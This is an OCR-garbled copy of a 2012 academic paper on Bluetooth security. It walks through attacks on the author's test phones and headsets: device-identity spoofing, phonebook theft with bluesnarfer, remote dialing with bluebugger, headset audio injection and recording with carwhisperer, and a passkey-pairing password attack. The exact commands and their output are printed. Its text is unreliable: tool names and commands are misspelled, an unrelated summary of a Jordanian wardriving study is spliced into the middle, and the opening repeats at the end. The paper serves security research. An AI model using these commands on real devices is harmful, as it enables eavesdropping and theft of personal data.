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International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
DOI : 10.5121/ijnsa.2012.4303 41
Robayet Nasim
Assistant professor, Faculty of Science, Engineering, & Technology,
University of Science & Technology Chittagong, Bangladesh.,
Exponential growth of the volume of Bluetooth-enabled devices indicates that it has become a popular
way of wireless interconnections for exchanging information. The main goal of this paper is to analyze
the most critical Bluetooth attacks in real scenarios. In order to find out the major vulnerabilities in
modern Bluetooth-enabled mobile devices several attacks have performed successfully such as-
Surveillance, Obfuscation, Sniffing, Unauthorized Direct Data Access (UDDA) and Man-in-the-Middle
Attack (MITM). To perform the testbed, several devices are used such as mobile phones, laptops,
notebooks, wireless headsets, etc. and all the tests are carried out by pen-testing software like hcittml, br-
audit, spoafiooph, hridump, bluesnarfer, bluebugger and carwhisperer.
Bluetooth, Security, Surveillance, Obfuscation, Sniffing, Denial of service, Man-in-the-middle.
Bluetooth [I, 2] is a wireless communication technology for short range communication. It was
developed by Ericsson in 1994. It uses short wavelength radio transmissions from mobile or
fixed devices. Communicating devices can create Personal Area Networks with high levels of
security. The network is formed as a master slave structure. A master can communicate with 7
devices acting as slaves. At one time, data can only be transferred amongst two devices. In
principle, it provides a secure way of connection between devices, such as mobile phones,
laptops, printers, etc. Bluetooth devices can be used in many applications, such as transfer of
files, contact details or calendar entries sharing. The devices can also announce their own
Figure 1. Bluetooth logo.
Any Bluetooth device can be set as discoverable or discoverable mode. When a device is in
discoverable mode it transfers device name, device class, list of services and some technical
information on demand. There are three different security modes in Bluetooth devices:
• Security mode 1 has no active security enforcement.
• Security mode 2 has service level security but on device level there is no security
like security mode 1.
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
• Security mode 3 has device level security, and security is also enforced on every low
level connection.
In addition, Bluetooth is based on two main architectures in its protocol stack: HCI [3] and
LZCAP [4]. HCI stands for Host Controller Interface and provides a command interface to the
baseband controller and link manager, and also access to configuration parameters. At the
bottom level, the Logical Link Control and Application Protocol (L2CAP) supports higher level
protocol multiplexing, packet segmentation and reassembly, and the conveying of quality of
service information.
Like any other wireless technology Bluetooth is also subject to security concerns. Whenever a
device attempts to connect to another device, user has to decide if it wants to allow other device
to connect or not. When two devices attempt to pair up, a key is generated which is based on the
PIN number entered on both devices. A stream cipher is used for encrypting packets.
Bluetooth technology has been accepted by many instead of having problems regarding security
issues. Different types of vulnerabilities have been discovered since 2001 onwards [5-10]. Some
researchers from Bell labs discovered some problems in Bluetooth pairing protocol in 2001.
They have also highlighted some problems in encryption scheme.
A.L. digital found out that poor implementations of security mechanism in Bluetooth can lead to
loss of personal data.
In August 2004, an experiment was performed by a group of researchers. They showed that the
range of a Bluetooth device can be extended up to 177 kilometers. This can result in attackers
launching attacks from a distance beyond expectations.
Figure 2. Some applications which exploit Bluetooth vulnerabilities
Bluesnar [2] is an application that was developed by Marcel Holtmann and was published in
October 2003. In this attack, users’ information can be pulled by an attacker without going
through authentication mechanism.
Motivated by Bluesnarf, Bluebug was developed by Martin Herfurt during a field test at CeBIT
in 2004. Using this software an attacker can have full control over the phone and can issue AT
commands. Only hidden and protected channels are used in this attack.
Bluesmack is an attack in which users can use L2CAP’s echo feature to cause buffer overflows
and can also flood echo request messages causing denial of service to other users. Bluestab is
also a denial of service attack which can crash some phones. It was discovered by Q-Nix and
Collin R. Mulliner.
Another known attack is called Bluebump. The attacker uses a trivial method to open a
connection to the attacked device like VCard exchange. The connection is than kept open by
requesting the regeneration of the link key. This key can then be used later on as long as it
remains valid.
BlueSpoof is an attack carried out by cloning as a trusted device. It can clone device address,
service records, emulate protocols and profiles. The attacker then disables encryption and tries
to establish pair again.
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
ln the Bluechup attack, a piconet [2] (an ad—hoc computer network using Bluetooth
technology) is disrupted by a device which itself is not part of the target piconet. It spoofs any
randomly selected slave and contacts the master in charge of the piconet. This leads to
confusion in the network and master’s internal state gets disturbed. Blueprinting is an attack to
remotely find out about characteristics of a device.
All these facts led to the creation of Trifinite [11], a non-profit organization that hosts
information related to activities in the area of wireless devices with special focus on security.
In this paper, I have presented an overview about many of the available tools used today to find
out different types of vulnerabilities. They all are discussed briefly in the following sections.
3.1. Devices
I have tested the Bluetooth vulnerabilities using the following devices:
• 3 computers with build-in Bluetooth adapters.
• 4 mobile phones: Sony Ericsson V630i, Nokia 6500s, Sony Ericsson W715, and
Nokia 6230i.
• 2 headsets: Samsung WEP250 and Vivanco BTC5.
Bluetooth devices have a unique MAC address [2] which identifies them over the network. In
Table 1, I listed the computers’ addresses, phones and headsets used in my experiments.
3.2. HCI Tools
There are two basic tools available: hciconfig and hcitool which are included in the BlueZ [13]
package (the official Bluetooth stack for Gnu/linux). Both tools are executed under several
Gnu/linux distributions: Backtrack 4 [14], Ubuntu 10.04 and Kubuntu 10.04.
Figure 3. Sony Ericsson and Nokia mobile phones.
Figure 4. Samsung WEP250 and Vivanco BTC5 headsets
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
The hciconfig command shows all the information about the Bluetooth built-in adapter
including name and class. The class field defines the category of the device and can be modified
[15]. To show all the settings of the Bluetooth built-in adapter the following command applies:
Device Name MAC Address
Computer 1 pc-robayet 00:24:2C:B4:07:3B
Computer 2 pc-jishan 00:22:69:FD:F1:ED
Computer 3 pc-dihan 00:26:5E:C2:EA:08
Sony Ericsson V630i v630i 00:19:63:9A:1A:BE
Sony Ericsson W715 w715 00:25:E7:27:86:D1
Nokia 6500s nokia6500s 00:21:AA:83:80:A7
Nokia 6230i nokia6230i 00:12:D2:4B:0D:70
Samsung WEP250 Wep250 00:21:19:06:6A:FA
Vivanco BTC5 Btc5 00:07:B0:11:8F:6D
Table 1. List of devices involved in the experiments
$ hciconfig -i hci0 -a
Type: BR/EDR Bus: USB
BD Address: 00:26:5E:C2:EA:08 ACL MTU: 1021:8 SCO MTU: 64:1
Name: 'pc-jishan'
Class: 0x5a0l00
Service Classes: Networking, Capturing,
Object Transfer, Telephony
Device Class: Computer, Uncategorized
Manufacturer: Broadcom Corporation (15)
Moreover, hciconfig can be used to activate/deactivate the Blue-tooth system, enable encryption
or authentication and change many other settings. In some attacks it may be useful to change the
class to 0x500204 in order to be detected as a mobile phone.
$ hciconfig -i hci0 class 0x500204
In the other hand, hcitool is used to configure Bluetooth connections and sends some special
commands to Bluetooth devices. For instance, the most basic function is to scan visible devices.

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International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
$ hcitool -i hci0 scan
00:21:AA:83:SO:A7 nokia6500s
00:25:E7:27:86:D1 w715
00:12:D2:4B:OD:70 nokia6230i
Besides, it is also possible to create/delete baseband connections, display received signal
strength information, request authentication, enable/disable encryption and change the
connection link key among others.
3.3. Pinging Devices
In order to find out the status of any Bluetooth device, the best way is to ping using the 12ping
command. The following example shows how to ping nokia6500s sending five packets with a
delay of two seconds among them.
$ sudo 12ping -i hci0 -c 5 -d 2 00:21 :AA :83:80:A7
Ping: 00:21:AA:83:80:A7 from 00:22:69:FD:F1:ED (data size 44)
0 bytes from 00:21:AA:83:80:A7 id 0 time 28.72ms
0 bytes from 00:21:AA:83:80:A7 id 1 time S.82ms
5 sent, 5 received, 0%, loss
3.4. RFCOMM Connections
In order to associate one computer with another Bluetooth-enabled device a RFCOMM
connection must be established. It is very easy to create one using the rfcomm linux command
just specifying the target MAC address and channel.
For instance, to associate one computer with the Samsung WEP250 headset it is enough to type:
$ sudo rfcomm -i hci0 connect 0 00:21:19:06:6A:FA 1
Connected /dev/rfcomm0 to 00:21:19:06:6A:FA on channel 1
Press CTRL-C for hangup
As a result the virtual device /dev/rfcomm0 was successfully created.
3.4. Compiling Code
Unfortunately many of the applications which were included in the BackTrack Gnu/linux
distribution were not really updated. Sometimes I have needed to fix them because they used
obsolete definitions of RFCOMM nodes.
In order to compile code that uses BlueZ libraries it was necessary to install the libbluetooth
development libraries (available at the standard Ubuntu repositories). Once installed, the gcc
GNU compiler find them and works properly.
For instance, in order to compile the bluesnarfer application I have typed:
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
$ cd bluesnarfer/
$ make
gcc -Iinclude -W -g3 -Ibluetooth src/bluesnarfer.c -o bluesnarfer
$ . /bluesnarfer
4.1. Surveillance
Surveillance is a method used to acquire specific details about devices.
4.1.1. Available Tools
• BT-Audit: It provides applications to scan the L2CAP and RFCOMM, which are the
main Bluetooth protocols. It is a simple tool which combines the output of the hcitool,
sdptool, psm_scan and rfcomm_scan commands. It gives all the relevant information
without any permission to perform an attack.
4.1.2. Execution
At the beginning, I would like to start an attack against nokia6500s, at first I would like to know
all the services which are provided and which Bluetooth channels are assigned to them.
$ bt.audit 00:21:AA:83:80:A7 output.txt
$ cat output.txt
BD Address: 00:21 :AA:83:80:A7
Device Name: nokia6500s
LMP Version: 2.0 (0x3) LMP Subversion: 0x2222
Manufacturer: Broadcom Corporation (15)
Features: 0xbf 0xee 0x0f 0xce 0x98 0x39 0x00 0x00
<3-slot packets> <5-slot packets> <encryption> <slot offset> <timing accuracy>
<role SHitch> <sniff mode> <RSSI> <channel quality> <SCO link> <HV3 packets>
<u-law log> <A-law log> <CVSD> <paging scheme> <power control> <transparent
SCO> <EDR ACL 2 Hbps> <EDR ACL 3 Hbps> <enhanced iscan> <inquiry with
RSSI> <extended SCO> <AFH cap. slave> <AFH class. slave> <3-slot EDR ACL> <5-
slot EDR ACL> <AFH cap. master> <AFH class. master> <EDR eSCO 2 Mbps>
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10000
Attribute Identifier : Oxl - ServiceClassIDList
Data Sequence
UUID16 : 0x1116 - NAP (PJN/BNEP)
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
Channel/Port (Integer) : 0xf
Data Sequence
UUID16 : 0x000f - BNEP
Channel/Port (Integer) : 0x100
Data Sequence
Protocol (Integer) : 0x86dd
Channel/Port (Integer) : 0x806
[447 lines more]
4.2. Obfuscation
Attackers can use obfuscation to achieve a level of anonymity for launching an attack.
4.2.1. Available Tools
• HCIconfig: With this application a Bluetooth-enabled device can change its name and
• SpoofTooph [16]: Designed to automate spoofing or cloning Bluetooth device name,
class and address.
4.2.2. Execution
Firstly, I have checked the standard configuration of the Bluetooth built-in adapter called pc-
$ hciconfig -a
Type: BR/EDR Bus: USB
BD Address: 00:26:5E:C2:EA:08 ACL MTU: 1021:8 SCO MTU: 64:1
Name: 'pc-dihan’
Class: 0xSa0l00
Service Classes: networking, Capturing, Object Transfer, Telephony
Device Class: Computer, Uncategorized
At this moment, I have retrieved the information of the victim (mobile phone called v630i)
using SpoofTooph:
$sudo spoottooph -i hci0 -n v630i -a 00:19:63:9A:1A:BE -c 0x500204
Class Set: 0x500204
Name Set: v630i
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
Manufacturer: Broadcom Corporation (15)
Device address: 00:26:5E:C2:EA:08
New BD address: 00:19:63:9A:1A:BE
Finally, I have checked that obfuscation has performed properly:
$ hciconfig -a
Type: BR/EDR Bus: USB
BD Address: 00:19:63:9A:1A:BE ACL MTU: 1021:8 SCO MTU: 64:1
Name: 'v630i'
Class: 0x500204
Service Classes: Object Transfer, Telephony
Device Class: Phone, Cellular
Manufacturer: Broadcom Corporation (15)
Now, I can observe that the Bluetooth adapter has the name and MAC address of the victim.
4.3. Fuzzer
Fuzzing is a technique used to test application input handling. Fuzzers operate by submitting
nonstandard input to an application to achieve malicious results.
4.3.1. Available Tools
• Bluetooth Stack Smasher (BSS): It is a tool for assembling and sending packets to a
target device.
• BlueSmack: This can be used to generate a non-standard size of echo message response
packet just like an ICMP ping.
4.3.2. Execution
Despite I have found phones with older versions of Bluetooth, fuzzer attacks are completely
deprecated because the exploited vulnerabilities were fixed. Bluetooth Stack Smasher (BSS) and
bluesmack have become completely useless.
An example is shown below which produces absolutely no effect in the victim (v630i). Loop
mode (-M 0) is set with packet size of 1000 bits.
$ sudo ./bss -m 12 00:19:63:9A: 1A:BE -H 0 -s 1000
4.4. Sniffing
Sniffing [17] is an attack that intercepts and can log traffic passing over a digital network or part
of a network.
4.4.1. Available Tools

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International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
• HCIDump: It is an utility that can capture and read raw Bluetooth traffic by monitoring
local Bluetooth interfaces and capturing data from sniffed traffic.
4.4.2. Execution
The following example shows the sniffing result while pc-jishan attempts to ping nokia6500s.
$ sudo hcidump -i hci0 -X -V
HCI sniffer - Bluetooth packet analyzer ver 1.42
device: hci0 snap_len: 1028 filter: Oxffffffff
< HCI Command: Create Connection (0x0110x0005) plen 13
bdaddr 00:21:AA:83:80:A7 ...
Packet type: DM1 DM3 DMS DH1 DH3 DH5 >
HCI Event: Command Status (OxOf) plen 4
Create Connection (0x0110x0005) status 0x00 ncmd 1
< ACL data: handle 11 flags 0x02 dlen 52
L2CAP(s): Echo req: dlen 44
0000: 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4a 4f 50
0010: 51 52 53 54 55 56 57 58 59 5a Sb 5c 5d 5e 5f 60
0020: 61 62 63 64 65 66 67 68 41 42 43 44
Furthermore, the content of every message is displayed both in hex and ASCII codification.
4.5. Denial of Service (DoS)
Denial of service is an attack that can deny resources to a target. It often targets communication
channels, but it can relate to any service the device uses, including system availability. This
kind of attack is currently obsolete because newer Bluetooth specification fixed the
vulnerabilities those applications such as blueSmack exploited using the Ping of Death.
4.6. Unauthorized Direct Data Access (UDDA)
UDDA attacks gather private information for unauthorized entities by penetrating devices
through loopholes in security, allowing unauthorized access to privileged information.
4.6.1. Available Tools
• Bluebugger: It is a security loophole and allows the unauthorized downloading phone
books and call lists, the sending and reading of SMS messages from the attacked phone.
• BlueSnarfer: It connects to an OBEX [18] Push target and performs an OBEX GET
request for known filenames, such as pb.vcl for the devices phone book or cal.vcs for
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
the devices calendar file. In case of improper implementation of the device firmware, an
attacker is able to retrieve all files where the name is either known or guessed correctly.
4.6.2. Execution
Firstly, it was required to modify some code of bluesnarfer. Instead of accessing to
/dev/bluetooth/rfcomm/ we will simply use /dev/rfcomm.
After bluesnarfer was re-compiled, I have performed several attacks to the four mobile phones.
I have noticed that the newer versions of Bluetooth fixed the vulnerability exploited by
bluesnarfer. Thus, there is a partial attack that means, for every action there will be an
authorized association between phone and computer. This means that at least a message such as
"Connect with pc-XXX?" will be prompt in the phone screen.
bluesnarfer is able to retrieve all the contact phone list, messages, find/delete contact numbers
and dials numbers once the connection is done. This attack was performed successfully on all
the mobile phones of the experiment.
$ sudo ./bluesnarfer -r 1-80 -C 1 -b 00:12:D2:4B:OD:70
+ 1 - rahim : +92321661...
+ 20 - karim : +4676581...
+ 20 - rajib : +4676346...
+ 20 - mutmain : 073647...
+ 20 - Asif : 0300650. ..
bluesnarfer: release rfcomm ok
$ sudo ./bluesnarfer -f Asif -C 1 -b 00:12:D2:4B:OD:70
start to search name: Asif
+ 16 - Asif : 0300650...
bluesuarfer: release rfcomm ok
On the other hand, bluebugger exploits the same vulnerability but it is able to dial contact
numbers once the connection was established. Again, is a partial attack but very powerful if a
confused user accept the incoming connection.
The following examples show how to obtain basic information and dial any number:
$ sudo ./bluebugger -c 1 info -a 00:21:AA:83:80:A7
Target Device: '00:21:AA:83:80:A7'
Target Name: 'nokia6S00s'
Manufactor: Nokia
Model: Nokia 6500S-1
Revision: V 06.60 07-03-08 RM-240 (c) Nokia
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
PSN/IMEI: 3B483702818...
Capability: +CGSM,+DS,+W
$ sudo ./bluebugger dial 0046123466789 -a 00:19:63:9A:1A:BE -c 1
Target Device: '00:19:63:9A:1A:BE'
Target Name: 'v630i'
Dialing '0046707225985' to '0046123456789'
should be active now
Press <enter> to abort Bluetooth connection
*shows 'cancel call too?'-popup on Nokia 6310i
4.7. Man-in-the-Middle
MITM [2, 19] is a scenario in which an attacker makes independent connections with the
victims and relays messages between them.
4.7.1. Available Tools
• Bluebugger: It is a security loophole and allows the unauthorized BT-SSP Printer; this
application shows possible vulnerabilities in the newer Bluetooth standards. The BT-
SSP-Printer-MITM attack sets the attacker's device as a relay point between the user
device and a printer.
• Car whisperer: Initially developed for carkits, this application is able to establish a
connection with a headset in order to inject and record audio.
4.7.2. Execution
It is possible to perform a headset attack (Samsung WEP250) in order to retrieve and inject
audio without permission using carwhisperer. As an initial setup, this headset was already
associated with a mobile phone.
Some modifications were made in the source code in order to carry out the attack properly. Due
to important changes in the BlueZ linux protocol stack [12], the latest version [13] does not
include legacy support. To be precise, the function call rfcomm_connect was deleted and
instead, a file descriptor was used for a RFCOMM channel using I/O redirection.
To start the experiment, I have connected the computer and headset using one RFCOMM
$ sudo rfcomm -i hci0 connect 0 00:21:19:06:6A:FA 1
Connected /dev/rfcomm0 to 00:21:19:06:6A:FA on channel 1
Press CTRL-C for hangup
Then, the audio is injected to the headset sound is recorded from it at the same time invoking
carwhisperer with the proper parameters. The audio injected correspond to the message.raw file
and the output will be saved as out.raw.
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
$ sudo ,/caruhisperer hciO message.raw out.raw 00:21:19:06:6A:FA
1 3<> /dev/rfcomm0
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 6, mtu 64)
got: AT+BRSF=26
ansewered: +BRSF: 63
In order to start listening, it is necessary to convert the recorded audio (out. raw) to a waveform
audio file format (wav):
$ sudo sox -c 1 -r 8k -e signed -b 16 out.raw out.wav
Finally, the recorded file retrieved from the headset can be played:
$ aplay out.wav
Playing WAVE 'out.wav': Signed 16 bit Little Endian,
Rate 8000 Hz, Mono
4.8. Further Attacks (Password Guessing)
IMITM Regarding Bluetooth 2.1 specification [20], almost all devices with display are still
vulnerable to attacks. This issue takes place when the user enters the password on IU level as in
the passkey entry mode. In this scenario, the devices establish a connection using the same
password, and attackers without such information fail attempting to pair. Even with the new
security mechanisms adopted in this version, a man-in-the-middle attack could be feasible.
Attacks can be effective when the same password is used to pair multiple times, or when there is
a fixed random password provided by an automatic pairing agent. These threats come from a
bad implementation of the pairing protocol, especially in the public-key exchange stage. In this
protocol, the devices exchange messages for a Diffie-Hellman key exchange [2] over an Elliptic
curve group. In addition, these messages can be stored in the devices as public keys.
At this stage, the handshake protocol is described as follows: a device A sends its public key
PKa to device B, and the latter plies with its public key PKb. Now, both derive SK which is the
Secret key from the Diffie-Hellman key exchange with messages PKa andPKb.
In order to begin this conversation, most devices require the user to press a button in order to
pair, and once pairing has been carried out, the user doesn't have to verify the communication
again. However and despite the fact that the implementation follows the specification [21], after
the attacker has learned the password it can force the devices to re-pair [22]. Then, the attacker
can carry out an unauthorized direct data access (UDDA) pairing its own device first, or
performing a man-in-the-middle attack.

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Wireless Networks Security in Jordan: A Field Study

- The document summarizes a study that evaluated the security of wireless networks in Jordan through a process called "wardriving" where the researchers drove around with wireless network detection tools. - The results found that the majority (79.52%) of wireless networks tested were unsecured and vulnerable. Most networks used either low levels of encryption (68.67%) or no encryption at all (11.45%). - Nearly all networks broadcast the default SSID (92.17%), leaving them exposed to potential hackers since changing the SSID is a basic security precaution.

securitywired equivalent privacy (wep).wireless local area network (wlan)
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
In this section, I will state two main attacks taking the advantage of the security leak mentioned
above. First, a passive eavesdropping attack is presented and later an active attack on password-
protected devices is explained.
4.8.1. Available Tools
Using a Bluetooth packet analyzer, attackers can learn the password on a legitimate pairing
procedure between two devices in a short period of time, even if they share a very long key. The
weak part of the protocol resides in the option to establish a pairing process once again with the
same password.
Figure 5. Authentication stage 1: numeric comparison protocol. (Adapted from [20, p.1601])
The devices iterate exchanging commitments to bits of the passwords. Every bit corresponds to
iteration where the attacker can extract the following information (notation used from the
Bluetooth Core Specification [20]):
• PKa: public key of device A
• PKb: public key of device B
• Cai: commitment C for A in iteration i
• Cbi: commitment C for B in iteration i
• Na:. random nonce N chosen by A in iteration i
• Nbi: random nonce N chosen by B in iteration i
Hence, the only missing value is rai, the ith bit of the password from device A. This is calculated
by computing a single HMAC-SHA256 which can be set for instance to 0 in the given formula
fi (PKa, PKb,Nai,0). Here, fi is HMAC-SHA256 with key Nai and input (PKa,PKb, rai).
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
Figure 6. Packet analysis of the pairing protocol.
If the result matches with Cai, it concludes that rai = 0, or rai = 0 by process of elimination. It is
easy to conclude that given PKa, PKb and both all the commitments (Cak) and nonces (Nak), the
password could be derived with only k HMAC-SHA256 computations.
4.8.2. Active Attack on Password-Protected Devices
Using a Bluetooth Another attack can be carried out if the attacker is able to make repeated
pairing attempts with a device that has a fixed random password. This threat is even easier if the
target has an automatic pairing feature, which is common in most of the current devices.
The algorithm to perform the attack assumes the attacker A plays the role of initiator in a pairing
protocol with B as follows:
Figure 7. Public key exchange (Adapted from [20, p.428])
1. The attacker runs the public key exchange and the authentication steps. Following the
specification, these steps have to be carried out to verify that man-in-the-middle attacks
were not performed.
2. The attacker computes Ca, using a random value such as rai = 0.
3. After receiving Cbi from device B, the attacker sends Nal to B and waits for the reply. If
B continues, then the attacker knows that rbi = 0. Go to 1 for the next iteration i + 1.
4. If B aborts, regardless the initial value, the attacker knows finally rb1. Go to 1 to verify
again the current iteration i with the correct rb1 value.
It is relevant that in the algorithm, B aborts statistically half of the time. This means for instance
that when a random 6 digit password is used, the attacker can learn the fc-bit password after
only 10 attempts (a 6 digit password requires approximately 20 bits).
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
In order to prevent the eavesdropping attack [6], after the first public key exchange stage, the
devices should derive the Diffie-Hellman key DHKey. With this modification, the attacker
would not leak the password because both the commitments (Cai) and nonces (Nai) are now
encrypted by a key that only the legitimate pairing devices know.
Figure 8. Authentication Passkey entry (adapted from [20, p.432])
Another way to increase the security in the passkey entry mode is using a different random
password each time a connection is established. Some researches [6] suggest a new secure
password protocol to prevent attacks when the DHKey is known [23].
My last experiment has showed clearly that nowadays it is perfectly possible to inject and
record audio on headsets. This vulnerability might be fixed very soon in the Bluetooth
technology. However, most of the Bluetooth built-in adapters use very low power therefore this
experiment cannot be performed within large distances, but it is always possible to purchase
better adapters or powerful antennas.
Considering my first hacking environment (Backtrack Gnu/Linux), I have noticed a lack of
updates in the Bluetooth applications included. Furthermore, the drivers for the Bluetooth
adapters are properly upload but there is no widget or manager running by default. This means
that RFCOMM connections cannot be established in this operating system unless a Bluetooth
manager is installed (without this, it is impossible to type PTN codes so connections are
refused). Fortunately, I have decided to test the applications in my own Gnu/Linux systems,
where the experiments have performed successfully.
Based on the above research, it is obvious that on one side different types of vulnerabilities in
Bluetooth-enabled mobile devices have identified and simultaneously the Bluetooth standard is
updating to remove these vulnerabilities. The tests and experiments have proved that most of the
modern devices such as headphones and PCs are more protective against different types of
attacks because in most of the scenarios, the user has to accept the connection. However the
successful attacks for the devices with low interactivity such as Bluetooth headphones revealed
that it is possible to inject or record sounds in these devices without authenticated connection.
The purpose of this paper is to highlight the security issues of the Bluetooth-enabled devices.
[1] The official Bluetooth technology info site, http: //
[2] Chi Shing Lee. Bluetooth Security Protocol Analysis and Improvements, M.Sc. thesis at San
Jose State University,
[3] HCI Architecture, Architecture
_Host.Controller. Interface_HCI.aspx
International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012
[4] L2CAP Architecture, Technology/Works/Pages/Architecture
[5] Dunning, J. P. (2010). Taming the Blue Beast: A survey of Bluetooth-Based Threads, IEEE
Mobile Device Security.
[6] Lindell, A. Y. (2008). Attacks on the Pairing Protocol of Bluetooth v2.1 Black Hat presentations.
[7] Bluetooth keyboards. Who owns your keystrokes?,
[8] Breaking bluetooth by being bored, Defcon18 conference.
[9] Becker, A. (2007). Bluetooth security & hacks, Ruhr-Universitt Bochum.
[10] Laurie, A., Holtmann, M. and Herfurt, M (2006). Bluetooth Security Hacking: the state of the
art, WEBSEC. London, United Kingdom,
[11] Trifinite group,
[12] Bottcma, B. (2010). How Ubuntu's broken bluetooth support came to be. Benny's blog, how-ubuntus-broken-bluetooth-support-came-to-be/.
[13] BlueZ: official Linux Bluetooth protocol stack,
[14] Backtrack Linux. Penetration testing distribution, http://www.
[15] Bluetooth class of device/service (CoD) generator, http://
bluetooth_class_ of_device-service_generator.html.
[16] A hack from a cave, pwntooth.html.
[17] Spill, D. and Bittau, A., BlueSniff (2007). Eve meets Alice and Bluetooth, First USENIX
Workshop on Offensive Technologies. Boston, https: //
[18] OBEX transfer protocol, Technology/Works/pages/obex.aspx.
[19] Sharmila, D., Neelaveni, R. and Kiruba, K. (2009), Bluetooth Man-In-The-Middle attack based
on secure simple pairing using out of band association model, International conference on
Control, Automation, Communication and Energy Conservation, http://
[20] Bluetooth Core Specification v2.1 + EDR,
Documents/ Core_V21__EDR. Zip.
[21] Guide to Bluetooth Security, US National Institute of Standards and Technology, http://csrc.nist
[22] Shaked, Y. and Wool, A. (2005). Cracking the Bluetooth PIN, In Proc. of 3rd USENIX/ACM
Conf. Mobile Systems, Applications, and Services (MobiSys).
[23] Katz, J. Ostrovsky, R., Yung, M. (2001). Efficient password-authenticated key exchange using
human-memorable passwords, EUROCKYPT 2001, Springer-Verlag (LNCS 2045), pages 475-
Robayet Nasim was awarded a B.Sc. (Engg.) degree in computer science and
Engineering from the University of Science and Technology Chittagong (USTC)
in 2005, and a M.Sc. in Software Engineering of Distributed Systems from KTH
Royal Institute of Technology in 2011. He is an Assistant Professor in the
Faculty of science, Engineering, & Technology, University of Science and
Technology Chittagong (USTC). His main research interests are in decentralized
networks and questions related to security and privacy

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Security threats analysis in bluetooth enabled mobile devices

  • 1. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 DOI : 10.5121/ijnsa.2012.4303 41 SECURITY THREATS ANALYSIS IN BLUETOOTH- ENABLED MOBILE DEVICES Robayet Nasim Assistant professor, Faculty of Science, Engineering, & Technology, University of Science & Technology Chittagong, Bangladesh., ABSTRACT Exponential growth of the volume of Bluetooth-enabled devices indicates that it has become a popular way of wireless interconnections for exchanging information. The main goal of this paper is to analyze the most critical Bluetooth attacks in real scenarios. In order to find out the major vulnerabilities in modern Bluetooth-enabled mobile devices several attacks have performed successfully such as- Surveillance, Obfuscation, Sniffing, Unauthorized Direct Data Access (UDDA) and Man-in-the-Middle Attack (MITM). To perform the testbed, several devices are used such as mobile phones, laptops, notebooks, wireless headsets, etc. and all the tests are carried out by pen-testing software like hcittml, br- audit, spoafiooph, hridump, bluesnarfer, bluebugger and carwhisperer. KEYWORDS Bluetooth, Security, Surveillance, Obfuscation, Sniffing, Denial of service, Man-in-the-middle. 1. INTRODUCTION Bluetooth [I, 2] is a wireless communication technology for short range communication. It was developed by Ericsson in 1994. It uses short wavelength radio transmissions from mobile or fixed devices. Communicating devices can create Personal Area Networks with high levels of security. The network is formed as a master slave structure. A master can communicate with 7 devices acting as slaves. At one time, data can only be transferred amongst two devices. In principle, it provides a secure way of connection between devices, such as mobile phones, laptops, printers, etc. Bluetooth devices can be used in many applications, such as transfer of files, contact details or calendar entries sharing. The devices can also announce their own services. Figure 1. Bluetooth logo. Any Bluetooth device can be set as discoverable or discoverable mode. When a device is in discoverable mode it transfers device name, device class, list of services and some technical information on demand. There are three different security modes in Bluetooth devices: • Security mode 1 has no active security enforcement. • Security mode 2 has service level security but on device level there is no security like security mode 1.
  • 2. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 42 • Security mode 3 has device level security, and security is also enforced on every low level connection. In addition, Bluetooth is based on two main architectures in its protocol stack: HCI [3] and LZCAP [4]. HCI stands for Host Controller Interface and provides a command interface to the baseband controller and link manager, and also access to configuration parameters. At the bottom level, the Logical Link Control and Application Protocol (L2CAP) supports higher level protocol multiplexing, packet segmentation and reassembly, and the conveying of quality of service information. Like any other wireless technology Bluetooth is also subject to security concerns. Whenever a device attempts to connect to another device, user has to decide if it wants to allow other device to connect or not. When two devices attempt to pair up, a key is generated which is based on the PIN number entered on both devices. A stream cipher is used for encrypting packets. 2. BACKGROUND Bluetooth technology has been accepted by many instead of having problems regarding security issues. Different types of vulnerabilities have been discovered since 2001 onwards [5-10]. Some researchers from Bell labs discovered some problems in Bluetooth pairing protocol in 2001. They have also highlighted some problems in encryption scheme. A.L. digital found out that poor implementations of security mechanism in Bluetooth can lead to loss of personal data. In August 2004, an experiment was performed by a group of researchers. They showed that the range of a Bluetooth device can be extended up to 177 kilometers. This can result in attackers launching attacks from a distance beyond expectations. Figure 2. Some applications which exploit Bluetooth vulnerabilities Bluesnar [2] is an application that was developed by Marcel Holtmann and was published in October 2003. In this attack, users’ information can be pulled by an attacker without going through authentication mechanism. Motivated by Bluesnarf, Bluebug was developed by Martin Herfurt during a field test at CeBIT in 2004. Using this software an attacker can have full control over the phone and can issue AT commands. Only hidden and protected channels are used in this attack. Bluesmack is an attack in which users can use L2CAP’s echo feature to cause buffer overflows and can also flood echo request messages causing denial of service to other users. Bluestab is also a denial of service attack which can crash some phones. It was discovered by Q-Nix and Collin R. Mulliner. Another known attack is called Bluebump. The attacker uses a trivial method to open a connection to the attacked device like VCard exchange. The connection is than kept open by requesting the regeneration of the link key. This key can then be used later on as long as it remains valid. BlueSpoof is an attack carried out by cloning as a trusted device. It can clone device address, service records, emulate protocols and profiles. The attacker then disables encryption and tries to establish pair again.
